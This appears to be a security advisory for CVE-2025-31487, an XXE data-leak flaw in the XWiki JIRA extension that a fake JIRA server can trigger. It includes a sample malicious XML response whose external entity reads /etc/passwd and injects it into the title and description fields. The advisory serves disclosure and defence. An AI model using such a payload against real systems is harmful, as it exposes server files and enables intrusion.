CVE-2025-31487: The XWiki JIRA extension allows data leak through an XXE attack by using a fake JIRA server
If the JIRA macro is installed, any logged in XWiki user could edit his/her user profile wiki page and use that JIRA macro, specifying a fake JIRA URL that returns an XML specifying a DOCTYPE pointing to a local file on the XWiki server host and displaying that file’s content in one of the returned JIRA fields (such as the summary or description for example).
For example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<rss version="0.92">
...
<item>
<title>&xxe;</title>
<link>https://jira.xwiki.org/browse/XE-307</link>
<project id="10222" key="XE">{RETIRED} XWiki Enterprise</project>
<description>&xxe;</description>
<environment/>
...
References
- github.com/advisories/GHSA-wc53-4255-gw3f
- github.com/xwiki-contrib/jira
- github.com/xwiki-contrib/jira/commit/5049e352d16f8356734de70daf1202301f170ee6
- github.com/xwiki-contrib/jira/commit/98a74c2a516b42689c73b13ecd94e9c1998fa9cb
- github.com/xwiki-contrib/jira/security/advisories/GHSA-wc53-4255-gw3f
- jira.xwiki.org/browse/JIRA-49
- nvd.nist.gov/vuln/detail/CVE-2025-31487
Code Behaviors & Features
Detect and mitigate CVE-2025-31487 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →